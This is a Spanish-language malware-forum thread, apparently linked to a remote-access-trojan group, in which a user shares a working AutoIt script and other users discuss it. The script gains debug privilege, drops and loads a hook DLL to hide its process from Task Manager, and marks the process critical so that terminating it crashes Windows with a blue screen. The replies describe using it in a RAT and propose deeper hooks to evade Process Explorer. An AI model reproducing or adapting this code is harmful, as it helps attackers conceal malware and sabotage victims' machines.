Buenas , los dejo esta funcion que ay traduzido para AutoIt

Su funcionamiento és muy util creo :

No salta en la pantala de Task Manager el proceso activo e

se intentas cerrar el processo por otros medios .... BSOD ( Pantala Azul )

Que lo disfrutem

PD : la version que carga la Dll 'Onthefly' me la guardo xD

Saludos



Código: Seleccionar todo

#RequireAdmin
#include <WinApi.au3>

;==========================================================
; Func sHideProcess
; Hide Process From TaskManager With Privilege
; Author : M3
; Usage : sHideProcess()
; Thanks to : Pink | Houdini | Guests AHK
; Release : 16 / 02 / 2013
; Download Dll x86 | x64
; [url]http://www.datafilehost.com/download-bbb317e0.html[/url]
;==========================================================


sHideProcess()


Func sHideProcess()

Local $sStructData , $sStruct , $sLoadDll , $sDllLoaded , $GetProcessAdd , _
      $sDllAdress , $sHook , $sReturn , $sHandle, $ProcessId ,$sBsodStruct


If Not @Compiled then
    MsgBox(0,'','Compile Code to Test',1)
    Exit
EndIf


If @AutoItX64 = False Then

sDebugPrivilege()

FileInstall('Hook.dll' , @WindowsDir & '\Hook.dll')

;Else

;FileInstall('Hook64.dll' , @WindowsDir & '\Hook.dll')

;EndIf

Msgbox(0,'','Hiding Process' , 2)

$sStructData = 'int LoadDll;int DllAdress;int BSOD'

$sStruct = DllStructCreate($sStructData)


If @error Then
    MsgBox(0, '', 'Error en la Structura ...' , 2)
    Exit
EndIf


$sLoadDll =  DllCall('Kernel32.dll', 'handle', 'LoadLibrary', 'str', @WindowsDir & '\Hook.dll') ;for x86

DllStructSetData($sStruct, 'LoadDll', $sLoadDll[0])

$sDllLoaded = DllStructGetData($sStruct , 1)

$GetProcessAdd = CallAPI_GetProcAddress($sDllLoaded,  'Hidden')

DllStructSetData($sStruct, 'DllAdress', $GetProcessAdd)

$sDllAdress = DllStructGetData($sStruct ,2)

$sHook = CallAPI_SetWindowsHookEx (5, $sDllAdress ,  $sDllLoaded)

$ProcessId = _WinAPI_GetCurrentProcessID()

$sHandle = CallAPI_OpenProcess('0X001F0FFF' , True , $ProcessId)

DllStructSetData($sStruct,'BSOD',true)

$sBsodStruct = DllStructGetPtr($sStruct , 3)

$Return = CallAPI_NtSetInformationProcess ($sHandle , 29 , $sBsodStruct ,4)

_WinAPI_CloseHandle ($sHandle)

EndIf


EndFunc




while 1

	Sleep(7000)
	MsgBox(0,'','Malware is Running with Privileges ...' , 2)

WEnd





Func sDebugPrivilege ()

Local $HToken,$HLastError

$HToken = _Security__OpenThreadTokenEx (BITOR($Token_Adjust_Privileges, $Token_Query))

$HLastError = _Security__SetPrivilege($HToken, 'SeDebugPrivilege' , True)

_WinAPI_CloseHandle($HToken)

Return $HLastError

EndFunc




Func CallAPI_GetProcAddress($hModule, $sProcess)

    Local $sReturn = DllCall('Kernel32', 'ptr', 'GetProcAddress', 'ptr', $hModule, 'str', $sProcess)

	Return  $sReturn[0]

EndFunc




Func CallAPI_SetWindowsHookEx($idHook, $lpfn, $hmod, $dwThreadId = 0)

	Local $sReturn = DllCall('User32', 'handle', 'SetWindowsHookEx', 'int', $idHook, 'ptr', $lpfn, 'handle', $hmod, 'dword', $dwThreadId)

	Return $sReturn[0]

EndFunc




Func CallAPI_UnhookWindowsHookEx($hhk)

	Local $sReturn = DllCall('User32', 'bool', 'UnhookWindowsHookEx', 'handle', $hhk)

	Return $sReturn[0]

EndFunc



Func CallAPI_OpenProcess($iAccess, $bInherit, $iProcessID)

      Local $sResult = DllCall('Kernel32', 'int', 'OpenProcess', 'int', $iAccess, 'int', $bInherit, 'int', $iProcessID)

      Return $sResult[0]

EndFunc



Func CallAPI_NtSetInformationProcess($sHandle , $ProcClass, $ProcInfo, $ProcLength )

      Local $sResult = DllCall ('Ntdll' , 'int' , 'NtSetInformationProcess', 'handle', $sHandle , 'int' ,$ProcClass , 'ptr' , $ProcInfo ,'uLong', $ProcLength)

	  Return  $sResult [0]

EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
KHC escribió:Lindo hook @M3!
Buena base para documentar en este lenguaje :)

Gracias compadre , me tardo un poko pero quedo bueno ao final , un saludo
Indetectables RAT v.0.9.5

@Indetectables Team
Gracias tios , ya me jodieram el link , aca los dejo

[Enlace externo eliminado para invitados]

Saludos
Indetectables RAT v.0.9.5

@Indetectables Team
adwind escribió:No lo habia visto pero esta bueno eso!


Un excelente Code :D

Que va , gracias tio , un saludo


Gracias por los comentarios

Indetectables RAT v.0.9.5

@Indetectables Team
Un pokito mas de imagacion y el process explorer no lo ve ...

tal vez podamos hablar en privado mandame tu FB o gmail...te cuento mi metodo
Ida pro 5.0
ollydbg
Windbg
Inmunytydebugger
Hexing
y un cerebro

Mostrar/Ocultar

x4r0r escribió:Un pokito mas de imagacion y el process explorer no lo ve ...

tal vez podamos hablar en privado mandame tu FB o gmail...te cuento mi metodo

imagino que hables de un hook a NtQuerySystemInformation ¿ ( se si , mira el link de mi firma )

te envio un MP , un gusto hablar-te

Saludo

Indetectables RAT v.0.9.5

@Indetectables Team
Himanen escribió:Gracias tío, confirmo que el BSOD funciona de puta madre

Salud!
que bueno compadre me alegro , espero el hide = tenga te funcionado capo

Saludo
Indetectables RAT v.0.9.5

@Indetectables Team
Joder esto es un buen método, lastima que no soy capaz de leer Autoit 100% y no puedo comprender bien su código. Pero esta muy bien para un RAT!
Gracias!
disculpame por no responderte a tiempo...

mira todo depende que tan interno sea el gancho (hook) , el hoo de esa api no es nivel kernel hay algo mas profundo es ahmm no recuerdo el nombre de la tabla de procesos , tngo entendido que sysinternals verifica procesos desd nivel kernel
habria que probar

no me haz mandado tu facebook...
Ida pro 5.0
ollydbg
Windbg
Inmunytydebugger
Hexing
y un cerebro

Mostrar/Ocultar

x4r0r escribió:disculpame por no responderte a tiempo...

mira todo depende que tan interno sea el gancho (hook) , el hoo de esa api no es nivel kernel hay algo mas profundo es ahmm no recuerdo el nombre de la tabla de procesos , tngo entendido que sysinternals verifica procesos desd nivel kernel
habria que probar

no me haz mandado tu facebook...

Te Envie MP , pero creo no te lhego , raro que = no veo el MP en enviados xD , quisas debo canbiar de hieba

tranki bro, a ver lo que hablas que sea mas profundo que nivel kernel , hablamos CD puedas , te enviare mi MSN , no tengo FeoBook

Indetectables RAT v.0.9.5

@Indetectables Team
Imagen


[Enlace externo eliminado para invitados]

SeSinglePrivilegeCheck

M3 odio msn ...creo ke nos comunicaremos por privado xD cuando tenga tiempo te mando el codigo ke tengo aca ya tu lo compilas ...y lo analizas mas profundo...

hay te dejo algo mas de info ..arriba
Ida pro 5.0
ollydbg
Windbg
Inmunytydebugger
Hexing
y un cerebro

Mostrar/Ocultar

Responder

Volver a “Fuentes”